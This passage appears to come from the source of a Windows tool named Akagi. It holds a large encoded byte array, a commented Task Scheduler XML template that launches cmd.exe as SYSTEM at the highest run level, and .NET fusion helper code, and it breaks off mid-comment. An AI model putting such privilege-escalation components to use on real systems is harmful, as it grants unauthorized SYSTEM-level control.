0x77, 0x9E, 0x0B, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0xD8, 0x82, 0xC9,\n\t0xA8, 0xF6, 0x5E, 0xA5, 0xED, 0xDA, 0xC7, 0x77, 0x35, 0x6D, 0x83, 0x0D, 0xC3, 0x4F, 0x96, 0x8A,\n\t0x00, 0xA8, 0xBF, 0xCA, 0x93, 0xAF, 0x17, 0x3E, 0x5A, 0xF4, 0xE8, 0xD7, 0x87, 0x4E, 0x9F, 0x35,\n\t0x7E, 0xF4, 0xE8, 0xDD, 0xA9, 0x4A, 0x9E, 0x3F, 0x74, 0xFA, 0xE7, 0xD5, 0xA7, 0x4D, 0x8C, 0x24,\n\t0x74, 0xFA, 0xE1, 0xD2, 0xA7, 0x47, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xCD, 0xA6, 
0x4F, 0x9F, 0x3D,\n\t0x2E, 0xF6, 0xFF, 0x84, 0xD5, 0x2E, 0xEE, 0x73, 0x15, 0x9A, 0xAC, 0xAB, 0xC4, 0x2A, 0xEE, 0x49,\n\t0x13, 0x9B, 0x87, 0x87, 0xCF, 0x3D, 0xF1, 0x4A, 0x09, 0xF5, 0xE9, 0xD3, 0xA7, 0xC7, 0xBD, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0x6A, 0xCA, 0xD3, 0xA7, 0x4F, 0xBE, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0xDF, 0xBD, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x62,\n\t0x39, 0x9B, 0x9B, 0x97, 0xCB, 0x23, 0xD3, 0x5C, 0x13, 0x9A, 0xE9, 0xBE, 0xD4, 0x2C, 0xF1, 0x4F,\n\t0x1F, 0x91, 0xC7, 0xB7, 0xCB, 0x23, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0x2C, 0x82, 0x4F, 0xBE, 0x7D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD2, 0xA7, 0x5F, 0x9E, 0x3D,\n\t0x7A, 0xEC, 0xE9, 0xD3, 0x27, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD2, 0xA7, 0x4E, 0x9E, 0x3D, 0x7A, 0xC4, 0xE9, 0xD3, 0x27, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD2, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xBC, 0xE9, 0xD3, 0xA7, 0x17, 0xDE, 0x3D, 0x7A, 0xB8, 0xEB, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x03, 0x9C, 0x09, 0x7A, 0xF4, 0xE9, 0x85, 0xA7, 0x1C, 0x9E, 0x62,\n\t0x7A, 0xA2, 0xE9, 0x96, 0xA7, 0x1D, 0x9E, 0x6E, 0x7A, 0xBD, 0xE9, 0x9C, 0xA7, 0x01, 0x9E, 0x62,\n\t0x7A, 0xBD, 0xE9, 0x9D, 0xA7, 0x09, 0x9E, 0x72, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0xF2, 0x9A, 
0xD2,\n\t0x84, 0xF4, 0xE9, 0xD2, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x70, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4B, 0x9E, 0x3D,\n\t0x7A, 0xF6, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xB0, 0xE9, 0xD3, 0xA7, 0x4E, 0x9E, 0x6B, 0x7A, 0x95, 0xE9, 0xA1, 0xA7, 0x09, 0x9E, 0x54,\n\t0x7A, 0x98, 0xE9, 0xB6, 0xA7, 0x06, 0x9E, 0x53, 0x7A, 0x92, 0xE9, 0xBC, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xD0, 0xE9, 0xD7, 0xA7, 0x4F, 0x9E, 0x69, 0x7A, 0x86, 0xE9, 0xB2, 0xA7, 0x21, 0x9E, 0x4E,\n\t0x7A, 0x98, 0xE9, 0xB2, 0xA7, 0x3B, 0x9E, 0x54, 0x7A, 0x9B, 0xE9, 0xBD, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0x63, 0xA3, 0xE3, 0x9F, 0x3D, 0x7A, 0xF5, 0xE9, 0x80, 0xA7, 0x3B, 0x9E, 0x4F,\n\t0x7A, 0x9D, 0xE9, 0xBD, 0xA7, 0x28, 0x9E, 0x7B, 0x7A, 0x9D, 0xE9, 0xBF, 0xA7, 0x2A, 0x9E, 0x74,\n\t0x7A, 0x9A, 0xE9, 0xB5, 0xA7, 0x20, 0x9E, 0x3D, 0x7A, 0x7C, 0xE8, 0xD3, 0xA7, 0x4E, 0x9E, 0x0D,\n\t0x7A, 0xC4, 0xE9, 0xE3, 0xA7, 0x7F, 0x9E, 0x0D, 0x7A, 0xC0, 0xE9, 0xB1, 0xA7, 0x7F, 0x9E, 0x3D,\n\t0x7A, 0xD8, 0xE9, 0xD1, 0xA7, 0x4E, 0x9E, 0x7B, 0x7A, 0x9D, 0xE9, 0xBF, 0xA7, 0x2A, 0x9E, 0x79,\n\t0x7A, 0x91, 0xE9, 0xA0, 0xA7, 0x2C, 0x9E, 0x4F, 0x7A, 0x9D, 0xE9, 0xA3, 0xA7, 0x3B, 0x9E, 0x54,\n\t0x7A, 0x9B, 0xE9, 0xBD, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xD4, 0xE9, 0xD3, 0xA7, 0x7F, 0x9E, 0x35,\n\t0x7A, 0xF5, 0xE9, 0x95, 0xA7, 0x26, 0x9E, 0x51, 0x7A, 0x91, 0xE9, 0x85, 0xA7, 0x2A, 0x9E, 0x4F,\n\t0x7A, 0x87, 0xE9, 0xBA, 0xA7, 0x20, 0x9E, 0x53, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x7F, 0x9E, 0x13,\n\t0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x13, 0x7A, 0xC4, 0xE9, 0xD3, 0xA7, 0x73, 0x9E, 0x30,\n\t0x7A, 0xF5, 0xE9, 0x9A, 0xA7, 0x21, 0x9E, 0x49, 0x7A, 0x91, 0xE9, 0xA1, 0xA7, 0x21, 0x9E, 0x5C,\n\t0x7A, 0x98, 0xE9, 0x9D, 0xA7, 0x2E, 0x9E, 0x50, 0x7A, 0x91, 0xE9, 0xD3, 0xA7, 0x2C, 0x9E, 0x47,\n\t0x7A, 0x9E, 0xE9, 0xB5, 0xA7, 0x38, 0x9E, 0x4C, 0x7A, 0x93, 0xE9, 0xBD, 0xA7, 0x61, 0x9E, 0x59,\n\t0x7A, 
0x98, 0xE9, 0xBF, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xDC, 0xE9, 0xD1, 0xA7, 0x4E, 0x9E, 0x71,\n\t0x7A, 0x91, 0xE9, 0xB4, 0xA7, 0x2E, 0x9E, 0x51, 0x7A, 0xB7, 0xE9, 0xBC, 0xA7, 0x3F, 0x9E, 0x44,\n\t0x7A, 0x86, 0xE9, 0xBA, 0xA7, 0x28, 0x9E, 0x55, 0x7A, 0x80, 0xE9, 0xD3, 0xA7, 0x6F, 0x9E, 0x3D,\n\t0x7A, 0xB0, 0xE9, 0xDE, 0xA7, 0x4E, 0x9E, 0x72, 0x7A, 0x86, 0xE9, 0xBA, 0xA7, 0x28, 0x9E, 0x54,\n\t0x7A, 0x9A, 0xE9, 0xB2, 0xA7, 0x23, 0x9E, 0x7B, 0x7A, 0x9D, 0xE9, 0xBF, 0xA7, 0x2A, 0x9E, 0x53,\n\t0x7A, 0x95, 0xE9, 0xBE, 0xA7, 0x2A, 0x9E, 0x3D, 0x7A, 0x97, 0xE9, 0xA9, 0xA7, 0x25, 0x9E, 0x5B,\n\t0x7A, 0x83, 0xE9, 0xA2, 0xA7, 0x28, 0x9E, 0x53, 0x7A, 0xDA, 0xE9, 0xB7, 0xA7, 0x23, 0x9E, 0x51,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x7B, 0x9E, 0x35, 0x7A, 0xF5, 0xE9, 0x83, 0xA7, 0x3D, 0x9E, 0x52,\n\t0x7A, 0x90, 0xE9, 0xA6, 0xA7, 0x2C, 0x9E, 0x49, 0x7A, 0xA2, 0xE9, 0xB6, 0xA7, 0x3D, 0x9E, 0x4E,\n\t0x7A, 0x9D, 0xE9, 0xBC, 0xA7, 0x21, 0x9E, 0x3D, 0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x13,\n\t0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x3D, 0x7A, 0xCC, 0xE9, 0xDB, 0xA7, 0x4E, 0x9E, 0x7C,\n\t0x7A, 0x87, 0xE9, 0xA0, 0xA7, 0x2A, 0x9E, 0x50, 0x7A, 0x96, 0xE9, 0xBF, 0xA7, 0x36, 0x9E, 0x1D,\n\t0x7A, 0xA2, 0xE9, 0xB6, 0xA7, 0x3D, 0x9E, 0x4E, 0x7A, 0x9D, 0xE9, 0xBC, 0xA7, 0x21, 0x9E, 0x3D,\n\t0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x13, 0x7A, 0xC4, 0xE9, 0xFD, 0xA7, 0x7F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 
0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0xBE, 0x3D,\n\t0x7A, 0xF8, 0xE9, 0xD3, 0xA7, 0xFF, 0xAD, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 
0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 
};\n\n/*\n* g_encodedTaskParamBegin/g_encodedTaskParamEnd\n\nReference = L\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-16\\\"?>\\\n<Task version=\\\"1.3\\\" xmlns=\\\"http://schemas.microsoft.com/windows/2004/02/mit/task\\\">\\\n  <RegistrationInfo>\\\n\t<Description>Test Task</Description>\\\n  </RegistrationInfo>\\\n  <Triggers />\\\n  <Principals>\\\n\t<Principal id=\\\"Author\\\">\\\n\t  <UserId>SYSTEM</UserId>\\\n\t  <RunLevel>HighestAvailable</RunLevel>\\\n\t</Principal>\\\n  </Principals>\\\n  
<Settings>\\\n\t<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\\\n\t<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\\\n\t<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\\\n\t<AllowHardTerminate>true</AllowHardTerminate>\\\n\t<StartWhenAvailable>false</StartWhenAvailable>\\\n\t<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\\\n\t<IdleSettings>\\\n\t  <Duration>PT10M</Duration>\\\n\t  <WaitTimeout>PT1H</WaitTimeout>\\\n\t  <StopOnIdleEnd>true</StopOnIdleEnd>\\\n\t  <RestartOnIdle>false</RestartOnIdle>\\\n\t</IdleSettings>\\\n\t<AllowStartOnDemand>true</AllowStartOnDemand>\\\n\t<Enabled>true</Enabled>\\\n\t<Hidden>false</Hidden>\\\n\t<RunOnlyIfIdle>false</RunOnlyIfIdle>\\\n\t<UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine>\\\n\t<WakeToRun>false</WakeToRun>\\\n\t<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\\\n\t<Priority>7</Priority>\\\n  </Settings>\\\n  <Actions Context=\\\"Author\\\">\\\n\t<Exec>\\\n\t  <Command>cmd.exe</Command>\\\n\t</Exec>\\\n  </Actions>\\\n</Task>\";\n\ng_encodedTaskParamBegin = L\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-16\\\"?>\\\n<Task version=\\\"1.3\\\" xmlns=\\\"http://schemas.microsoft.com/windows/2004/02/mit/task\\\">\\\n<RegistrationInfo>\\\n<Description>Test Task</Description>\\\n</RegistrationInfo>\\\n<Triggers />\\\n<Principals>\\\n<Principal 
id=\\\"Author\\\">\\\n<UserId>SYSTEM</UserId>\\\n<RunLevel>HighestAvailable</RunLevel>\\\n</Principal>\\\n</Principals>\\\n<Settings>\\\n<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\\\n<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\\\n<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\\\n<AllowHardTerminate>true</AllowHardTerminate>\\\n<StartWhenAvailable>false</StartWhenAvailable>\\\n<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\\\n<IdleSettings>\\\n<Duration>PT10M</Duration>\\\n<WaitTimeout>PT1H</WaitTimeout>\\\n<StopOnIdleEnd>true</StopOnIdleEnd>\\\n<RestartOnIdle>false</RestartOnIdle>\\\n</IdleSettings>\\\n<AllowStartOnDemand>true</AllowStartOnDemand>\\\n<Enabled>true</Enabled>\\\n<Hidden>false</Hidden>\\\n<RunOnlyIfIdle>false</RunOnlyIfIdle>\\\n<UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine>\\\n<WakeToRun>false</WakeToRun>\\\n<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\\\n<Priority>7</Priority>\\\n</Settings>\\\n<Actions Context=\\\"Author\\\">\\\n<Exec>\\\n<Command>\";\n\ng_encodedTaskParamEnd = L\"</Command>\\\n</Exec>\\\n</Actions>\\\n</Task>\";\n\n*/\n\nstatic const unsigned char g_encodedTaskParamBegin[2308] = {\n\t/* ... */\n};\n\nstatic const unsigned char g_encodedTaskParamEnd[69] = {\n\t/* ... */\n};\n\nstatic const unsigned char g_webviewvsinfo[1224] = {\n\t/* ... */\n};\n"
  },
  {
    "path": "Source/Akagi/fusutil.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2020 - 2026\n*\n*  TITLE:       FUSUTIL.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n/*\n* fusUtilInitFusion\n*\n* Purpose:\n*\n* Load .NET Assembly Manager dll and remember function pointers.\n*\n*/\nBOOLEAN fusUtilInitFusion(\n    _In_ DWORD dwVersion\n)\n{\n    HMODULE hFusion;\n    LPCWSTR lpFusionDir;\n    pfnCreateAssemblyCache CreateAssemblyCache;\n    pfnCreateAssemblyEnum CreateAssemblyEnum;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    if (g_ctx->FusionContext.Initialized)\n        return TRUE;\n\n    if (dwVersion != 2 && dwVersion != 4)\n        return FALSE;\n\n    //\n    // Build path to assembly manager dll\n    //\n    _strcpy(szBuffer, g_ctx->szSystemRoot);\n    _strcat(szBuffer, MSNETFRAMEWORK_DIR);\n\n#ifdef _WIN64\n    _strcat(szBuffer, TEXT(\"64\"));\n#endif\n\n    if (dwVersion == 2)\n        lpFusionDir = NET2_DIR;\n    else\n        lpFusionDir = NET4_DIR;\n\n    supConcatenatePaths(szBuffer, lpFusionDir, ARRAYSIZE(szBuffer));\n    supConcatenatePaths(szBuffer, TEXT(\"fusion.dll\"), ARRAYSIZE(szBuffer));\n\n    hFusion = LoadLibraryEx(szBuffer, NULL, 0);\n    if (hFusion == NULL)\n        return FALSE;\n\n    CreateAssemblyCache = (pfnCreateAssemblyCache)GetProcAddress(hFusion, \"CreateAssemblyCache\");\n    CreateAssemblyEnum = (pfnCreateAssemblyEnum)GetProcAddress(hFusion, \"CreateAssemblyEnum\");\n    if (CreateAssemblyCache == NULL ||\n        CreateAssemblyEnum == NULL)\n    {\n        FreeLibrary(hFusion);\n        return FALSE;\n    }\n\n    
g_ctx->FusionContext.hFusion = hFusion;\n    g_ctx->FusionContext.CreateAssemblyCache = CreateAssemblyCache;\n    g_ctx->FusionContext.CreateAssemblyEnum = CreateAssemblyEnum;\n    g_ctx->FusionContext.Initialized = TRUE;\n\n    return TRUE;\n}\n\n/*\n* fusUtilBinToUnicodeHex\n*\n* Purpose:\n*\n* Bin to Hex special edition.\n*\n*/\nVOID fusUtilBinToUnicodeHex(\n    _In_ const BYTE* pSrc,\n    _In_ UINT cSrc,\n    _Out_cap_(2 * cSrc + 1) LPWSTR pDst)\n{\n    UINT x;\n    UINT y;\n\n#define TOHEX(a) (WCHAR)((a)>=10 ? L'a'+(a)-10 : L'0'+(a))\n\n    for (x = 0, y = 0; x < cSrc; ++x)\n    {\n        UINT v;\n        v = pSrc[x] >> 4;\n        pDst[y++] = TOHEX(v);\n        v = pSrc[x] & 0x0f;\n        pDst[y++] = TOHEX(v);\n    }\n    pDst[y] = L'\\0';\n}\n\n/*\n* fusUtilGetAssemblyName\n*\n* Purpose:\n*\n* Return assembly name.\n*\n* Note: Use supHeapFree to release lpAssemblyName allocated memory.\n*\n*/\nHRESULT fusUtilGetAssemblyName(\n    _In_ IAssemblyName* pInterface,\n    _Inout_ LPWSTR* lpName,\n    _Out_opt_ PSIZE_T pcchName,\n    _Inout_opt_ LPWSTR* lpDisplayName,\n    _Out_opt_ PSIZE_T pcchDisplayName\n)\n{\n    DWORD cchName = 0;\n    HRESULT hr;\n    LPWSTR assemblyName = NULL, displayName = NULL;\n\n    do {\n\n        if (pcchName) *pcchName = 0;\n        if (pcchDisplayName) *pcchDisplayName = 0;\n\n        hr = pInterface->lpVtbl->GetName(pInterface, &cchName, NULL);\n        if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))\n            break;\n\n        assemblyName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));\n        if (assemblyName)\n            hr = pInterface->lpVtbl->GetName(pInterface, &cchName, (LPOLESTR)assemblyName);\n        else\n            hr = E_OUTOFMEMORY;\n\n        if (pcchName) {\n            if (SUCCEEDED(hr))\n                *pcchName = cchName;\n        }\n\n        cchName = 0;\n        hr = pInterface->lpVtbl->GetDisplayName(pInterface, NULL, &cchName, 0);\n        if (hr != 
HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))\n            break;\n\n        displayName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));\n        if (displayName)\n            hr = pInterface->lpVtbl->GetDisplayName(pInterface, (LPOLESTR)displayName, &cchName, 0);\n        else\n            hr = E_OUTOFMEMORY;\n\n        if (pcchDisplayName) {\n            if (SUCCEEDED(hr))\n                *pcchDisplayName = cchName;\n        }\n\n    } while (FALSE);\n\n    *lpName = assemblyName;\n    if (lpDisplayName)\n        *lpDisplayName = displayName;\n    else if (displayName)\n        supHeapFree(displayName); // Display name was not requested by the caller, release it.\n\n    return hr;\n}\n\n/*\n* 